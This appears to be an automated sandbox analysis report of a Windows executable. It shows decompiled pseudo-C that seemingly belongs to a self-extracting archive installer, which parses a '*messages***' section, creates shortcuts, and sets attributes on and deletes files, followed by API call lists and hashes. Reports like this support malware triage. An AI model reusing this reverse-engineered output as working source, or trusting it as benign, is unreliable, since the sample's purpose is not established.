                										 *0xcfde1c = __eax;
                									}
                									__eax = __ebp + 0xc;
                									_push(__ebp + 0xc);
                									 *0xcfde18 = E00CBA2AE(__ecx, __edx, __eflags);
                								}
                								 *0xcf5d03 = 1;
                								goto L167;
                							case 9:
                								__eflags = __ebx - 5;
                								if(__ebx != 5) {
                									L94:
                									 *0xcfde20 = 1;
                									goto L167;
                								}
                								_push(1);
                								L93:
                								__eax = __ebp - 0x5c84;
                								_push(__ebp - 0x5c84);
                								_push( *(__ebp + 8));
                								__eax = E00CBC431();
                								goto L94;
                							case 0xa:
                								__eflags = __ebx - 6;
                								if(__ebx != 6) {
                									goto L167;
                								}
                								__eax = 0;
                								 *(__ebp - 0x2c3c) = __ax;
                								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
                								__eax = E00CC59C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
                								_push(0x800);
                								__eflags = __eax - 0x50;
                								if(__eax == 0x50) {
                									_push(0xcfad0a);
                									__eax = __ebp - 0x2c3c;
                									_push(__ebp - 0x2c3c);
                									__eax = E00CAFAB1();
                									 *(__ebp - 0x14) = 2;
                								} else {
                									__eflags = __eax - 0x54;
                									__eax = __ebp - 0x2c3c;
                									if(__eflags == 0) {
                										_push(0xcf9d0a);
                										_push(__eax);
                										__eax = E00CAFAB1();
                										 *(__ebp - 0x14) = 7;
                									} else {
                										_push(0xcfbd0a);
                										_push(__eax);
                										__eax = E00CAFAB1();
                										 *(__ebp - 0x14) = 0x10;
                									}
                								}
                								__eax = 0;
                								 *(__ebp - 0x9c8c) = __ax;
                								 *(__ebp - 0x1c3c) = __ax;
                								__ebp - 0x19c8c = __ebp - 0x6c84;
                								__eax = E00CC4D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
                								_pop(__ecx);
                								_pop(__ecx);
                								_push(0x22);
                								_pop(__ebx);
                								__eflags =  *(__ebp - 0x6c84) - __bx;
                								if( *(__ebp - 0x6c84) != __bx) {
                									__ebp - 0x6c84 = E00CA9E6B(__ebp - 0x6c84);
                									__eflags = __al;
                									if(__al != 0) {
                										goto L152;
                									}
                									__ebx = __edi;
                									__esi = __ebp - 0x6c84;
                									__eflags =  *(__ebp - 0x6c84) - __bx;
                									if( *(__ebp - 0x6c84) == __bx) {
                										goto L152;
                									}
                									_push(0x20);
                									_pop(__ecx);
                									do {
                										__eax = __esi->i & 0x0000ffff;
                										__eflags = __ax - __cx;
                										if(__ax == __cx) {
                											L140:
                											__edi = __eax;
                											__eax = 0;
                											__esi->i = __ax;
                											__ebp - 0x6c84 = E00CA9E6B(__ebp - 0x6c84);
                											__eflags = __al;
                											if(__al == 0) {
                												__esi->i = __di;
                												L148:
                												_push(0x20);
                												_pop(__ecx);
                												__edi = 0;
                												__eflags = 0;
                												goto L149;
                											}
                											_push(0x2f);
                											_pop(__eax);
                											__ebx = __esi;
                											__eflags = __di - __ax;
                											if(__di != __ax) {
                												_push(0x20);
                												_pop(__eax);
                												do {
                													__esi =  &(__esi->i);
                													__eflags = __esi->i - __ax;
                												} while (__esi->i == __ax);
                												_push(__esi);
                												__eax = __ebp - 0x1c3c;
                												L146:
                												_push(__eax);
                												__eax = E00CC4D7E();
                												_pop(__ecx);
                												_pop(__ecx);
                												 *__ebx = __di;
                												goto L148;
                											}
                											 *(__ebp - 0x1c3c) = __ax;
                											__eax =  &(__esi->i);
                											_push( &(__esi->i));
                											__eax = __ebp - 0x1c3a;
                											goto L146;
                										}
                										_push(0x2f);
                										_pop(__edx);
                										__eflags = __ax - __dx;
                										if(__ax != __dx) {
                											goto L149;
                										}
                										goto L140;
                										L149:
                										__esi =  &(__esi->i);
                										__eflags = __esi->i - __di;
                									} while (__esi->i != __di);
                									__eflags = __ebx;
                									if(__ebx != 0) {
                										__eax = 0;
                										__eflags = 0;
                										 *__ebx = __ax;
                									}
                									goto L152;
                								} else {
                									__ebp - 0x19c8a = __ebp - 0x6c84;
                									E00CC4D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
                									_push(__ebx);
                									_push(__ebp - 0x6c82);
                									__eax = E00CC0BB8(__ecx);
                									__esp = __esp + 0x10;
                									__eflags = __eax;
                									if(__eax != 0) {
                										__ecx = 0;
                										 *__eax = __cx;
                										__ebp - 0x1c3c = E00CC4D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
                										_pop(__ecx);
                										_pop(__ecx);
                									}
                									L152:
                									__eflags =  *(__ebp - 0x11c8c);
                									__ebx = 0x800;
                									if( *(__ebp - 0x11c8c) != 0) {
                										_push(0x800);
                										__eax = __ebp - 0x9c8c;
                										_push(__ebp - 0x9c8c);
                										__eax = __ebp - 0x11c8c;
                										_push(__ebp - 0x11c8c);
                										__eax = E00CAAED7();
                									}
                									_push(__ebx);
                									__eax = __ebp - 0xbc8c;
                									_push(__ebp - 0xbc8c);
                									__eax = __ebp - 0x6c84;
                									_push(__ebp - 0x6c84);
                									__eax = E00CAAED7();
                									__eflags =  *(__ebp - 0x2c3c);
                									if(__eflags == 0) {
                										__ebp - 0x2c3c = E00CBA24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
                									}
                									__ebp - 0x2c3c = E00CAAEA5(__eflags, __ebp - 0x2c3c, __ebx);
                									__eflags =  *((short*)(__ebp - 0x17c8c));
                									if(__eflags != 0) {
                										__ebp - 0x17c8c = __ebp - 0x2c3c;
                										E00CAFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
                										__eax = E00CAAEA5(__eflags, __ebp - 0x2c3c, __ebx);
                									}
                									__ebp - 0x2c3c = __ebp - 0xcc8c;
                									__eax = E00CC4D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
                									__eflags =  *(__ebp - 0x13c8c);
                									__eax = __ebp - 0x13c8c;
                									_pop(__ecx);
                									_pop(__ecx);
                									if(__eflags == 0) {
                										__eax = __ebp - 0x19c8c;
                									}
                									__ebp - 0x2c3c = E00CAFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
                									__eax = __ebp - 0x2c3c;
                									__eflags = E00CAB153(__ebp - 0x2c3c);
                									if(__eflags == 0) {
                										L162:
                										__ebp - 0x2c3c = E00CAFA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
                										goto L163;
                									} else {
                										__eflags = __eax;
                										if(__eflags == 0) {
                											L163:
                											_push(1);
                											__eax = __ebp - 0x2c3c;
                											_push(__ebp - 0x2c3c);
                											E00CA9D3A(__ecx, __ebp) = __ebp - 0xbc8c;
                											__ebp - 0xac8c = E00CC4D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
                											_pop(__ecx);
                											_pop(__ecx);
                											__ebp - 0xac8c = E00CAB98D(__eflags, __ebp - 0xac8c);
                											__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
                											__eax = __ebp - 0x1c3c;
                											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
                											__edx = __ebp - 0x9c8c;
                											__esi = __ebp - 0xac8c;
                											asm("sbb ecx, ecx");
                											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
                											 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
                											asm("sbb eax, eax");
                											__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
                											 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
                											__eax = __ebp - 0x15c8c;
                											asm("sbb edx, edx");
                											__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
                											E00CB9D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
                											__ebp - 0xbc8c = E00CB9450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
                											__eflags =  *(__ebp - 0xcc8c);
                											if( *(__ebp - 0xcc8c) != 0) {
                												_push(__edi);
                												__eax = __ebp - 0xcc8c;
                												_push(__ebp - 0xcc8c);
                												_push(5);
                												_push(0x1000);
                												__eax =  *0xcddef8();
                											}
                											goto L167;
                										}
                										goto L162;
                									}
                								}
                							case 0xb:
                								__eflags = __ebx - 7;
                								if(__ebx == 7) {
                									 *0xce9600 = 1;
                								}
                								goto L167;
                							case 0xc:
                								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                								__eax = E00CC59C0( *(__ebp - 0x5c84) & 0x0000ffff);
                								__eflags = __eax - 0x46;
                								if(__eax == 0x46) {
                									 *0xce75d4 = 1;
                								} else {
                									__eflags = __eax - 0x55;
                									if(__eax == 0x55) {
                										 *0xce75d5 = 1;
                									} else {
                										__eax = 0;
                										 *0xce75d4 = __al;
                										 *0xce75d5 = __al;
                									}
                								}
                								goto L167;
                							case 0xd:
                								 *0xcfde21 = 1;
                								__eax = __eax + 0xcfde21;
                								_t112 = __esi + 0x39;
                								 *_t112 =  *(__esi + 0x39) + __esp;
                								__eflags =  *_t112;
                								__ebp = 0xffffa37c;
                								if( *_t112 != 0) {
                									_t114 = __ebp - 0x5c84; // 0xffff46f8
                									__eax = _t114;
                									_push(_t114);
                									 *0xcdd5fc = E00CB13FC();
                								}
                								goto L167;
                						}
                						L4:
                						_t220 = E00CB9E24(_t220, _t296);
                						_t296 = _t296 + 0x2000;
                						_t293 = _t293 - 1;
                						if(_t293 != 0) {
                							goto L4;
                						} else {
                							_t297 = _t293;
                							goto L6;
                						}
                						L167:
                						_push(0x1000);
                						_t205 = _t302 - 0xe; // 0xffffa36e
                						_t206 = _t302 - 0xd; // 0xffffa36f
                						_t207 = _t302 - 0x5c84; // 0xffff46f8
                						_t208 = _t302 - 0xfc8c; // 0xfffea6f0
                						_push( *((intOrPtr*)(_t302 + 0xc)));
                						_t215 = E00CBA156();
                						_t278 =  *((intOrPtr*)(_t302 + 0x10));
                						 *((intOrPtr*)(_t302 + 0xc)) = _t215;
                					} while (_t215 != 0);
                				}
                			}











                0x00cbbe92
                0x00cbbe95
                0x00cbbeaa
                0x00cbbeac
                0x00cbbead
                0x00cbbead
                0x00cbbeb0
                0x00cbbeb0
                0x00cbbeb5
                0x00cbbeb6
                0x00cbbebc
                0x00cbbebc
                0x00cbbebd
                0x00cbbec2
                0x00cbbec3
                0x00cbbec4
                0x00000000
                0x00cbbec4
                0x00cbbe97
                0x00cbbe9e
                0x00cbbea1
                0x00cbbea2
                0x00000000
                0x00cbbea2
                0x00cbbe6e
                0x00cbbe70
                0x00cbbe71
                0x00cbbe74
                0x00000000
                0x00000000
                0x00000000
                0x00cbbed1
                0x00cbbed1
                0x00cbbed4
                0x00cbbed4
                0x00cbbed9
                0x00cbbedb
                0x00cbbedd
                0x00cbbedd
                0x00cbbedf
                0x00cbbedf
                0x00000000
                0x00cbbdf7
                0x00cbbdfe
                0x00cbbe0a
                0x00cbbe10
                0x00cbbe11
                0x00cbbe12
                0x00cbbe17
                0x00cbbe1a
                0x00cbbe1c
                0x00cbbe22
                0x00cbbe24
                0x00cbbe32
                0x00cbbe37
                0x00cbbe38
                0x00cbbe38
                0x00cbbee2
                0x00cbbee2
                0x00cbbeea
                0x00cbbeef
                0x00cbbef1
                0x00cbbef2
                0x00cbbef8
                0x00cbbef9
                0x00cbbeff
                0x00cbbf00
                0x00cbbf00
                0x00cbbf05
                0x00cbbf06
                0x00cbbf0c
                0x00cbbf0d
                0x00cbbf13
                0x00cbbf14
                0x00cbbf19
                0x00cbbf21
                0x00cbbf2d
                0x00cbbf2d
                0x00cbbf3a
                0x00cbbf3f
                0x00cbbf47
                0x00cbbf51
                0x00cbbf5e
                0x00cbbf65
                0x00cbbf65
                0x00cbbf71
                0x00cbbf78
                0x00cbbf7d
                0x00cbbf85
                0x00cbbf8b
                0x00cbbf8c
                0x00cbbf8d
                0x00cbbf8f
                0x00cbbf8f
                0x00cbbfa4
                0x00cbbfa9
                0x00cbbfb5
                0x00cbbfb7
                0x00cbbfc8
                0x00cbbfd5
                0x00000000
                0x00cbbfb9
                0x00cbbfc4
                0x00cbbfc6
                0x00cbbfda
                0x00cbbfda
                0x00cbbfdc
                0x00cbbfe2
                0x00cbbfe8
                0x00cbbff6
                0x00cbbffb
                0x00cbbffc
                0x00cbc004
                0x00cbc009
                0x00cbc010
                0x00cbc016
                0x00cbc018
                0x00cbc01e
                0x00cbc024
                0x00cbc026
                0x00cbc02f
                0x00cbc032
                0x00cbc034
                0x00cbc03d
                0x00cbc040
                0x00cbc046
                0x00cbc049
                0x00cbc052
                0x00cbc061
                0x00cbc066
                0x00cbc06e
                0x00cbc070
                0x00cbc071
                0x00cbc077
                0x00cbc078
                0x00cbc07a
                0x00cbc07f
                0x00cbc07f
                0x00000000
                0x00cbc06e
                0x00000000
                0x00cbbfc6
                0x00cbbfb7
                0x00000000
                0x00cbc087
                0x00cbc08a
                0x00cbc08c
                0x00cbc08c
                0x00000000
                0x00000000
                0x00cbbab8
                0x00cbbac0
                0x00cbbac6
                0x00cbbac9
                0x00cbbaed
                0x00cbbacb
                0x00cbbacb
                0x00cbbace
                0x00cbbae1
                0x00cbbad0
                0x00cbbad0
                0x00cbbad2
                0x00cbbad7
                0x00cbbad7
                0x00cbbace
                0x00000000
                0x00000000
                0x00cbbb31
                0x00cbbb32
                0x00cbbb37
                0x00cbbb37
                0x00cbbb37
                0x00cbbb3a
                0x00cbbb3f
                0x00cbbb45
                0x00cbbb45
                0x00cbbb4b
                0x00cbbb51
                0x00cbbb51
                0x00000000
                0x00000000
                0x00cbb52a
                0x00cbb52c
                0x00cbb531
                0x00cbb537
                0x00cbb53a
                0x00000000
                0x00cbb53c
                0x00cbb53c
                0x00000000
                0x00cbb53c
                0x00cbc093
                0x00cbc093
                0x00cbc098
                0x00cbc09c
                0x00cbc0a0
                0x00cbc0a7
                0x00cbc0ae
                0x00cbc0b1
                0x00cbc0b6
                0x00cbc0b9
                0x00cbc0bc
                0x00cbc0c6

                APIs
                • __EH_prolog.LIBCMT ref: 00CBB4CC
                  • Part of subcall function 00CBA156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CBA21E
                • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,00CBADDF,?,00000000), ref: 00CBB601
                • GetFileAttributesW.KERNEL32(?), ref: 00CBB6BB
                • DeleteFileW.KERNEL32(?), ref: 00CBB6C9
                • SetWindowTextW.USER32(?,?), ref: 00CBB812
                • _wcsrchr.LIBVCRUNTIME ref: 00CBB99C
                • GetDlgItem.USER32(?,00000066), ref: 00CBB9D7
                • SetWindowTextW.USER32(00000000,?), ref: 00CBB9E7
                • SendMessageW.USER32(00000000,00000143,00000000,00CE9602), ref: 00CBB9FB
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CBBA24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                • API String ID: 3676479488-312220925
                • Opcode ID: 1834df9cab704b003eab3c10a62b468459cfa29036208e9377663a19245a0123
                • Instruction ID: 500cb27566139d66037d21f9f703e696d779a29e2893dbca0b0e180202d1e8fa
                • Opcode Fuzzy Hash: 1834df9cab704b003eab3c10a62b468459cfa29036208e9377663a19245a0123
                • Instruction Fuzzy Hash: 3FE14072D00219AAEF24EBA4DD85EEE737CAF45350F0041A6F559E7041EFB09F849BA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00CACFD0(signed int __ecx, void* __edx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				signed int _t196;
                				void* _t197;
                				WCHAR* _t198;
                				void* _t203;
                				signed int _t212;
                				signed int _t215;
                				signed int _t218;
                				signed int _t228;
                				void* _t229;
                				void* _t232;
                				signed int _t235;
                				signed int _t237;
                				signed int _t238;
                				signed int _t239;
                				signed int _t244;
                				signed int _t248;
                				signed int _t262;
                				signed int _t267;
                				signed int _t268;
                				signed int _t270;
                				signed int _t272;
                				signed int _t273;
                				void* _t274;
                				signed int _t279;
                				char* _t280;
                				signed int _t284;
                				short _t287;
                				void* _t288;
                				signed int _t294;
                				signed int _t299;
                				void* _t302;
                				void* _t304;
                				void* _t307;
                				signed int _t316;
                				signed int _t318;
                				unsigned int _t328;
                				signed int _t330;
                				unsigned int _t333;
                				signed int _t336;
                				void* _t343;
                				signed int _t348;
                				signed int _t351;
                				signed int _t352;
                				signed int _t357;
                				signed int _t361;
                				void* _t370;
                				signed int _t372;
                				signed int _t373;
                				void* _t374;
                				void* _t375;
                				intOrPtr* _t376;
                				signed int _t377;
                				signed int _t380;
                				signed int _t381;
                				signed int _t382;
                				signed int _t383;
                				signed int _t384;
                				signed int _t387;
                				signed int _t389;
                				signed int* _t390;
                				void* _t391;
                				void* _t392;
                				void* _t394;
                				void* _t398;
                				void* _t399;
                
                				_t370 = __edx;
                				_t318 = __ecx;
                				_t392 = _t391 - 0x6c;
                				E00CBD870(E00CD13DF, _t390);
                				E00CBD940();
                				_t196 = 0x5c;
                				_push(0x427c);
                				_push(_t390[0x1e]);
                				_t387 = _t318;
                				_t390[0x11] = _t196;
                				_t390[0x12] = _t387;
                				_t197 = E00CC0BB8(_t318);
                				_t316 = 0;
                				_t396 = _t197;
                				_t198 = _t390 - 0x1264;
                				if(_t197 != 0) {
                					E00CAFAB1(_t198, _t390[0x1e], 0x800);
                				} else {
                					GetModuleFileNameW(0, _t198, 0x800);
                					 *((short*)(E00CAB943(_t396, _t390 - 0x1264))) = 0;
                					E00CAFA89(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
                				}
                				E00CA943C(_t390 - 0x2288);
                				_push(4);
                				 *(_t390 - 4) = _t316;
                				_push(_t390 - 0x1264);
                				if(E00CA9768(_t390 - 0x2288, _t387) == 0) {
                					L57:
                					_t203 = E00CA946E(_t390 - 0x2288); // executed
                					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
                					return _t203;
                				} else {
                					_t380 = _t316;
                					_t398 =  *0xcdd5f4 - _t380; // 0x63
                					if(_t398 <= 0) {
                						L7:
                						E00CC5030(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E00CACC62);
                						E00CC5030(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E00CACBC7);
                						_t394 = _t392 + 0x20;
                						_t390[0x1e] = _t316;
                						_t381 = _t380 | 0xffffffff;
                						_t390[0x16] = _t316;
                						_t390[0x19] = _t381;
                						while(_t381 == 0xffffffff) {
                							_t390[0x1b] = E00CA9B57();
                							_t294 = E00CA9979(_t370, _t390 - 0x4288, 0x2000);
                							_t390[0x17] = _t294;
                							_t384 = _t316;
                							_t25 = _t294 - 0x10; // -16
                							_t361 = _t25;
                							_t390[0x15] = _t361;
                							if(_t361 < 0) {
                								L25:
                								_t295 = _t390[0x1b];
                								_t381 = _t390[0x19];
                								L26:
                								E00CA9A4C(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
                								_t299 = _t390[0x16] + 1;
                								_t390[0x16] = _t299;
                								__eflags = _t299 - 0x100;
                								if(_t299 < 0x100) {
                									continue;
                								}
                								__eflags = _t381 - 0xffffffff;
                								if(_t381 == 0xffffffff) {
                									goto L57;
                								}
                								break;
                							}
                							L10:
                							while(1) {
                								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
                									L14:
                									_t370 = 0x2a;
                									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
                										L18:
                										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
                											L21:
                											_t384 = _t384 + 1;
                											if(_t384 > _t390[0x15]) {
                												goto L25;
                											}
                											_t294 = _t390[0x17];
                											continue;
                										} else {
                											_t302 = E00CC5460(_t390 - 0x4286 + _t384, 0xcd261c, 4);
                											_t394 = _t394 + 0xc;
                											if(_t302 == 0) {
                												goto L57;
                											}
                											goto L21;
                										}
                									}
                									_t366 = _t390 - 0x4284 + _t384;
                									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
                										_t304 = E00CC4DA0(_t366, L"*messages***", 0xb);
                										_t394 = _t394 + 0xc;
                										if(_t304 == 0) {
                											_t390[0x1e] = 1;
                											goto L24;
                										}
                									}
                									goto L18;
                								} else {
                									_t307 = E00CC5460(_t390 - 0x4286 + _t384, "*messages***", 0xb);
                									_t394 = _t394 + 0xc;
                									if(_t307 == 0) {
                										L24:
                										_t295 = _t390[0x1b];
                										_t381 = _t384 + _t390[0x1b];
                										_t390[0x19] = _t381;
                										goto L26;
                									}
                									_t294 = _t390[0x17];
                									goto L14;
                								}
                							}
                						}
                						asm("cdq");
                						E00CA9A4C(_t390 - 0x2288, _t390, _t381, _t370, _t316);
                						_push(0x200002);
                						_t382 = E00CC2B53(_t390 - 0x2288);
                						_t390[0x1a] = _t382;
                						__eflags = _t382;
                						if(_t382 == 0) {
                							goto L57;
                						}
                						_t328 = E00CA9979(_t370, _t382, 0x200000);
                						_t390[0x19] = _t328;
                						__eflags = _t390[0x1e];
                						if(_t390[0x1e] == 0) {
                							_push(2 + _t328 * 2);
                							_t212 = E00CC2B53(_t328);
                							_t390[0x1e] = _t212;
                							__eflags = _t212;
                							if(_t212 == 0) {
                								goto L57;
                							}
                							_t330 = _t390[0x19];
                							 *(_t330 + _t382) = _t316;
                							__eflags = _t330 + 1;
                							E00CB0FDE(_t382, _t212, _t330 + 1);
                							L00CC2B4E(_t382);
                							_t382 = _t390[0x1e];
                							_t333 = _t390[0x19];
                							_t390[0x1a] = _t382;
                							L33:
                							_t215 = 0x100000;
                							__eflags = _t333 - 0x100000;
                							if(_t333 <= 0x100000) {
                								_t215 = _t333;
                							}
                							 *((short*)(_t382 + _t215 * 2)) = 0;
                							E00CAFA56(_t390 - 0xd4, 0xcd2624, 0x64);
                							_push(0x20002);
                							_t218 = E00CC2B53(0);
                							_t390[0x1b] = _t218;
                							__eflags = _t218;
                							if(_t218 != 0) {
                								__eflags = _t390[0x19];
                								_t336 = _t316;
                								_t371 = _t316;
                								_t390[0x1e] = _t336;
                								 *_t390 = _t316;
                								_t383 = _t316;
                								_t390[0x17] = _t316;
                								if(_t390[0x19] <= 0) {
                									L54:
                									E00CACB33(_t387, _t371, _t390, _t218, _t336);
                									L00CC2B4E(_t390[0x1a]);
                									L00CC2B4E(_t390[0x1b]);
                									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
                									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
                										L56:
                										 *0xce0124 =  *((intOrPtr*)(_t387 + 0x28));
                										E00CC5030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E00CACD08);
                										E00CC5030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E00CACD37);
                										goto L57;
                									} else {
                										goto L55;
                									}
                									do {
                										L55:
                										E00CB3393(_t387 + 0x3c, _t371, _t316);
                										E00CB3393(_t387 + 0x50, _t371, _t316);
                										_t316 = _t316 + 1;
                										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
                									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
                									goto L56;
                								}
                								_t390[0x14] = 0xd;
                								_t390[0x13] = 0xa;
                								_t390[0x15] = 9;
                								do {
                									_t228 = _t390[0x1a];
                									__eflags = _t383;
                									if(_t383 == 0) {
                										L80:
                										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
                										_t383 = _t383 + 1;
                										__eflags = _t372;
                										if(_t372 == 0) {
                											break;
                										}
                										__eflags = _t372 - _t390[0x11];
                										if(_t372 != _t390[0x11]) {
                											_t229 = 0xd;
                											__eflags = _t372 - _t229;
                											if(_t372 == _t229) {
                												L99:
                												E00CACB33(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
                												 *_t390 = _t316;
                												_t336 = _t316;
                												_t390[0x17] = _t316;
                												L98:
                												_t390[0x1e] = _t336;
                												goto L52;
                											}
                											_t232 = 0xa;
                											__eflags = _t372 - _t232;
                											if(_t372 == _t232) {
                												goto L99;
                											}
                											L96:
                											__eflags = _t336 - 0x10000;
                											if(_t336 >= 0x10000) {
                												goto L52;
                											}
                											 *(_t390[0x1b] + _t336 * 2) = _t372;
                											_t336 = _t336 + 1;
                											__eflags = _t336;
                											goto L98;
                										}
                										__eflags = _t336 - 0x10000;
                										if(_t336 >= 0x10000) {
                											goto L52;
                										}
                										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
                										__eflags = _t235;
                										if(_t235 == 0) {
                											_push(0x22);
                											L93:
                											_pop(_t377);
                											 *(_t390[0x1b] + _t336 * 2) = _t377;
                											_t336 = _t336 + 1;
                											_t390[0x1e] = _t336;
                											_t383 = _t383 + 1;
                											goto L52;
                										}
                										_t237 = _t235 - 0x3a;
                										__eflags = _t237;
                										if(_t237 == 0) {
                											_push(0x5c);
                											goto L93;
                										}
                										_t238 = _t237 - 0x12;
                										__eflags = _t238;
                										if(_t238 == 0) {
                											_push(0xa);
                											goto L93;
                										}
                										_t239 = _t238 - 4;
                										__eflags = _t239;
                										if(_t239 == 0) {
                											_push(0xd);
                											goto L93;
                										}
                										__eflags = _t239 != 0;
                										if(_t239 != 0) {
                											goto L96;
                										}
                										_push(9);
                										goto L93;
                									}
                									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
                									__eflags = _t373 - _t390[0x14];
                									if(_t373 == _t390[0x14]) {
                										L42:
                										_t343 = 0x3a;
                										__eflags =  *(_t228 + _t383 * 2) - _t343;
                										if( *(_t228 + _t383 * 2) != _t343) {
                											L71:
                											_t390[0x18] = _t228 + _t383 * 2;
                											_t244 = E00CAF91A( *(_t228 + _t383 * 2) & 0x0000ffff);
                											__eflags = _t244;
                											if(_t244 == 0) {
                												L79:
                												_t336 = _t390[0x1e];
                												_t228 = _t390[0x1a];
                												goto L80;
                											}
                											E00CAFAB1(_t390 - 0x264, _t390[0x18], 0x64);
                											_t248 = E00CC4E1D(_t390 - 0x264, L" \t,");
                											_t390[0x18] = _t248;
                											__eflags = _t248;
                											if(_t248 == 0) {
                												goto L79;
                											}
                											 *_t248 = 0;
                											E00CB11FA(_t390 - 0x264, _t390 - 0x138, 0x64);
                											E00CAFA56(_t390 - 0x70, _t390 - 0xd4, 0x64);
                											E00CAFA2F(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
                											E00CAFA56(_t390, _t390 - 0x70, 0x32);
                											_t262 = E00CC4E71(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E00CACCED);
                											_t394 = _t394 + 0x14;
                											__eflags = _t262;
                											if(_t262 != 0) {
                												_t268 =  *_t262 * 0xc;
                												__eflags = _t268;
                												_t167 = _t268 + 0xcdd150; // 0x28b64ee0
                												_t390[0x17] =  *_t167;
                											}
                											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
                											__eflags = _t383;
                											_t267 = _t390[0x1a];
                											_t374 = 0x20;
                											while(1) {
                												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
                												__eflags = _t348 - _t374;
                												if(_t348 == _t374) {
                													goto L78;
                												}
                												L77:
                												_t174 =  &(_t390[0x15]); // 0x9
                												__eflags = _t348 -  *_t174;
                												if(_t348 !=  *_t174) {
                													L51:
                													_t336 = _t390[0x1e];
                													goto L52;
                												}
                												L78:
                												_t383 = _t383 + 1;
                												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
                												__eflags = _t348 - _t374;
                												if(_t348 == _t374) {
                													goto L78;
                												}
                												goto L77;
                											}
                										}
                										_t389 = _t390[0x1a];
                										_t270 = _t228 | 0xffffffff;
                										__eflags = _t270;
                										_t390[0x16] = _t270;
                										_t390[0xd] = L"STRINGS";
                										_t390[0xe] = L"DIALOG";
                										_t390[0xf] = L"MENU";
                										_t390[0x10] = L"DIRECTION";
                										_t390[0x18] = _t316;
                										do {
                											_t390[0x18] = E00CC2B33( *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)));
                											_t272 = E00CC4DA0(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)), _t271);
                											_t394 = _t394 + 0x10;
                											_t375 = 0x20;
                											__eflags = _t272;
                											if(_t272 != 0) {
                												L47:
                												_t273 = _t390[0x16];
